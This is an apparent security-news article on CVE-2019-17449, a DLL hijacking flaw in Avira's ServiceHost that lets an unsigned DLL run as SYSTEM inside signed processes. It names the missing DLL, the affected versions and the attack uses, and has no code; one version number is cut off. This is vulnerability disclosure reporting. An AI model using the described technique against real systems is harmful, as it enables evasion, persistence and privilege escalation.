Exploitation of the vulnerability in Avira antivirus can increase system privileges

Exploitation of the vulnerabilities in Avira antivirus allows bypassing protection on the target system, ensure persistence and increase privileges.

SafeBreach researchers have discovered a dangerous vulnerability in the Avira 2019 antivirus program (CVE-2019-17449), the exploitation of which allows bypassing protection on the target system, ensuring persistence and increasing privileges by downloading an arbitrary unsigned DLL.

“The vulnerability give attackers the ability to load and execute malicious payloads within the context of Avira signed processes. This ability might be abused by an attacker for different purposes such as execution and evasion, for example: Application Whitelisting Bypass”, — write SafeBreach experts.

SafeBreach experts tested the Avira ServiceHost service (Avira Launcher service). Avira ServiceHost is a signed process that starts with NT AUTHORITY / SYSTEM privileges and is the first to install after start of the installation. According to experts, when starting Avira.ServiceHost.exe is trying to download the missing Windtrust.dll library from its directory. The vulnerability affects versions of Avira Launcher below 1.2.137 and versions of Avira Software Updater below

Read also:

As a rule, anti-virus solutions limit any modifications (for example, adding, writing or changing files) in folders using a mini-filter that applies a read-only policy to any user, including Administrator. As part of the experiment, the researchers compiled an arbitrary DLL library that writes the name of the process, which is loaded it into a text file, the name of the user who executed it, and the name of the DLL library.

“We managed to load an arbitrary DLL and execute the code inside Avira.ServiceHost.exe, which was signed by Avira Operations GmbH & Co. KG “and is executed as NT AUTHORITY / SYSTEM”, – experts say.

Researchers managed to carry out similar actions with other Avira services (System Speedup, Software Updater and Optimizer Host).

Experts have discovered three types of attacks that are possible when exploiting this vulnerability: bypassing anti-virus software protection; Downloading and executing malicious payload in the context of an Avira signed process ensuring persistence on the system.

Researchers notified the company about the vulnerability in July this year. In September, Avira released a patched version of Launcher (1.2.137).

William Reddy

I am from Ireland. My parents bought me a computer when I was 11, and several month after I have got a virus on this PC. I decided to enter the INSA Centre Val de Loire university after being graduated from the school. This French educational institution was offering a brand-new cybersecurity course. After getting the master degree in cybersecurity, I've started working in as virus analyst in a little anti-malware vendor. In 2018, I've decided to start Virus Removal project. The main target of this site is to help people to deal with PC viruses of any kind.

Leave a Reply

Your email address will not be published. Required fields are marked *


Back to top button